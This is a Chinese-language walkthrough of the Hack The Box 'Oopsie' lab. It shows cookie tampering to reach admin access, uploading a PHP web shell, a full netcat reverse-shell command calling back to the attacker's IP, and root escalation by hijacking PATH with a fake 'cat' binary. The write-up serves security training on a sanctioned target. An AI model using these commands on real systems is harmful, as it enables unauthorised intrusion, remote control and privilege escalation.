HTB-oopsie靶场练习

这篇具有很好参考价值的文章主要介绍了HTB-oopsie靶场练习。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

靶机地址: 10.129.130.57

攻击机地址: 10.10.14.185

HTB-oopsie靶场练习

HTB-oopsie靶场练习

端口扫描

nmap -sV -sC 10.129.130.57

HTB-oopsie靶场练习

访问10.129.130.57, 对一些可能有用的信息进行记录

HTB-oopsie靶场练习

打开burp, 刷新网页, 点击HTTP history,注意到/cdn-cgi/login/script.js

HTB-oopsie靶场练习

试着访问http://10.129.130.57/cdn-cgi/login/script.js,页面没有内容

访问http://10.129.130.57/cdn-cgi/login/,发现登录后台

HTB-oopsie靶场练习

帐号admin,试着进行弱密码爆破,但失败了

点击游客登录

HTB-oopsie靶场练习

HTB-oopsie靶场练习

对url的id值进行变换,最后在id=1处发现admin用户的相关信息

HTB-oopsie靶场练习

继续查看其它模块,发现在uploads模块中,发现需要管理员权限才能上传文件

HTB-oopsie靶场练习

F12进入控制台,点击storge,查看cookie,此时为游客权限

HTB-oopsie靶场练习

试着把cookie修改为刚才从account模块下得到的数据,刷新页面,完成纵向越权

HTB-oopsie靶场练习

将以下shell文件上传

HTB-oopsie靶场练习

上传成功

HTB-oopsie靶场练习

HTB-oopsie靶场练习

对靶机进行目录扫描,寻找php文件

gobuster dir -u http://10.129.130.57/ -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -x php

-u: 指定url

-w: 指定字典

-x: 指定文件后缀

HTB-oopsie靶场练习

发现一个/uploads目录

访问http://10.129.130.57/uploads/shell.php?cmd=whoami

HTB-oopsie靶场练习

使用nc监听8888端口

nc -lnvp 8888

浏览器输入:

10.129.130.57/uploads/shell.php?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.185 8888 >/tmp/f

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.185 8888 >/tmp/f    
// 这是一段反向shell,mkfifo 命令首先创建了一个管道,cat 将管道里面的内容输出传递给/bin/sh,sh会执行管道里的命令并将标准输出和错误输出结果通过nc传到该管道,形成了一个回路
// nc反向shell原理:被控端使用nc将/bin/sh发送到控制端的8888端口,控制端监听本地的8888端口,获得shell

如果终端没有响应,可用burp进行抓包重放,ctrl+u对参数进行unicode编码

HTB-oopsie靶场练习

连接成功

HTB-oopsie靶场练习

查看/etc/passwd文件,robert像是个用户

HTB-oopsie靶场练习

因为该shell不是交互式的,无法自动补全命令,无法移动光标等问题,且缺少tty,没有上下文环境,但该机器上存在python,所以使用python pty进行tty提升

python3 -c 'import pty;pty.spawn("/bin/bash");'  // 提升tty

获得更多访问权限后,ctrl+z将其放入后台

HTB-oopsie靶场练习

输入stty raw -echo;fg(fg是把后台的nc -lnvp调回前台)

输入export TERM=linux清除控制台

HTB-oopsie靶场练习

此时shell可交互,我们拥有tab键自动补全功能,也可以自由使用方向键

进入/var/www/html/cdn-cgi/login目录

输入grep -i “password” *

在当前目录下的所有文件中匹配password

*为当前目录,-i为不区分大小写

在/etc/passwd中没有发现admin用户,所以该密码无法在本台机器上登录

HTB-oopsie靶场练习

查看db.php,发现用户robert的密码

HTB-oopsie靶场练习

登录robert

HTB-oopsie靶场练习

到用户目录下,查看user.txt文件

HTB-oopsie靶场练习

查找group为bugtracker可调用的程序有哪些

find / -group bugtracker 2>/dev/null

/dev/null:写入该文件的数据不会被存储,通常用来丢弃数据

Linux系统预留可三个文件描述符0、1和2

含义:0→标准输入、1→标准输出、2→标准错误

2>/dev/null: 把错误信息丢弃

HTB-oopsie靶场练习

查看文件信息

ls -la /usr/bin/bugstracker

HTB-oopsie靶场练习

该文件的所有者为root,具有s(suid)权限位

s权限位:使文件在执行阶段具有文件所有者的权限,相当于临时拥有文件所有者的身份.

例: 典型文件/etc/passwd, 如果一般用户执行该文件, 则在执行过程中, 该文件可以获得root权限更改用户的密码.

输入bugstracker执行该命令, 并测试一些id

HTB-oopsie靶场练习

注意到cat: /root/reports/8888, 该命令使用cat来寻找该文件,并打印文件,但cat命令依赖path环境变量

输入echo $PATH,查看当前环境变量

HTB-oopsie靶场练习

在使用cat命令时,先从/usr/local/sbin下寻找该命令,如果没有找到,再从/usr/local/bin下寻找,以此类推到/usr/local/games,直到最后一个目录下也没找到该命令,就在终端输入command not found

 文章来源地址https://www.toymoban.com/news/detail-696172.html

进入tmp目录下,创建cat文件,cat文件中的内容为/bin/bash

使用chmod给改文件增加执行权限(x)

HTB-oopsie靶场练习

将tmp目录加入到环境变量$PATH

HTB-oopsie靶场练习

再次执行bugstracker,输入id

HTB-oopsie靶场练习

cat命令调用时,在tmp目录下被找到,并以root身份执行/bin/bash,提权成功

在/root/目录下找到root.txt

HTB-oopsie靶场练习

 

到了这里,关于HTB-oopsie靶场练习的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • HTB靶场之-inject

    攻击机:虚拟机kali。 靶机:Inject,htb网站:https://www.hackthebox.com/,靶机地址:https://app.hackthebox.com/machines/Inject。 知识点:ansible提权(非漏洞提权)、本地文件包含漏洞、CVE-2022-22963、敏感信息发现。 使用nmap扫描下端口对应的服务:nmap -T4 -sV -p22,80,8080,3306 -A 10.10.11.204,显示

    2024年02月04日
    浏览(44)
  • HTB靶场:简单inject

    扫描后显示服务和端口信息8080和22 1)有上传文件功能 简单上传了几个文件(txt,img等 上传过程根据参数简单测试了rce和注入发现无回显并且不对猜测可能不是此考点、转换思路上传的图片) 2)上传图片会显示路径。 3)看到有路径猜测是否可跨目录文件包含,试后发现有并

    2024年02月09日
    浏览(27)
  • HTB靶场 Shared

    靶场地址:Hack The Box 进入靶场地址之后,先连接靶场网络 点击右上角连接按钮 弹出窗口,选择第一个免费的选项SG FREE1 然后选择第一个选项 默认选项点击下载,将连接配置文件下载下来 之后在kali上命令行内使用命令直接连接 看到complete,还有刷新hackthebox也页面发现已经在

    2024年02月01日
    浏览(48)
  • HTB (hackthebox)Coder Insane靶机 User Flag WriteUp

    Coder

    2024年02月03日
    浏览(37)
  • [渗透测试学习靶机07] vulnhub靶场 Prime 2

    Kali的IP地址:192.168.127.139 靶机的IP地址:192.168.127.145 目录 一、信息搜集 二、漏洞挖掘 三、漏洞利用 四、提权 总结: Prime 2这个靶机我看网上很少有人通关打靶练习,自己尝试做了一下,感觉整体难度:比较难,大家可以参考一下。 1.1、扫描主机IP 1.2、扫描端口 发现开放了

    2024年02月05日
    浏览(48)
  • 实训渗透靶场02|3星vh-lll靶机|vulnhub靶场Node1

    写在前面: 此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除) netdiscover扫描目的IP 发现开放端口为22和3000 访问3000 3000端口是node 对node.js稍有了解的都知道 3000是node.js的默认端口,简

    2024年02月13日
    浏览(32)
  • web靶场——xss-labs靶机平台的搭建和代码审计

    目录 一、web靶场-xss-labs靶机平台的搭建 1、将下载好的压缩包放置php的WWW根目录下 2、配置网站 3、启动MYSQL和Nginx 4、完成后我们就可以在浏览器输入127.0.0.1:8088进入靶场 二、xss-labs靶场通关攻略 第一关: 1、输入代码进行测试:源代码 我们直接将参数插入标题试一试 第二关

    2024年02月04日
    浏览(52)
  • Vulnhub靶机渗透之新手入门 JIS-CTF入门靶场-学习笔记

    目录 学习前言 准备工作 一、寻找目标主机(信息收集) 二、敏感文件 三、Getshell上传木马 用蚁剑进行Getshell 四、寻找Linux密码进行ssh连接 五、连接SSH最后一步 六、总结 vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去

    2024年02月14日
    浏览(39)
  • Neos的渗透测试靶机练习——DarkHole-2

    1. 搜集信息 输入 sudo su ,将kali切换到 root权限 ; 输入 ifconfig 查询自身ip,即 攻击机ip ; 可以看到 自身ip 为 192.168.56.101 。 输入 arp-scan -l 扫描本网段存活主机,即 靶机ip地址 。 可以看到 靶机ip 为 192.168.56.105 ,。 输入 nmap -sV -p- 192.168.56.105 扫描靶机 所有端口开放情况 。

    2024年01月23日
    浏览(48)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包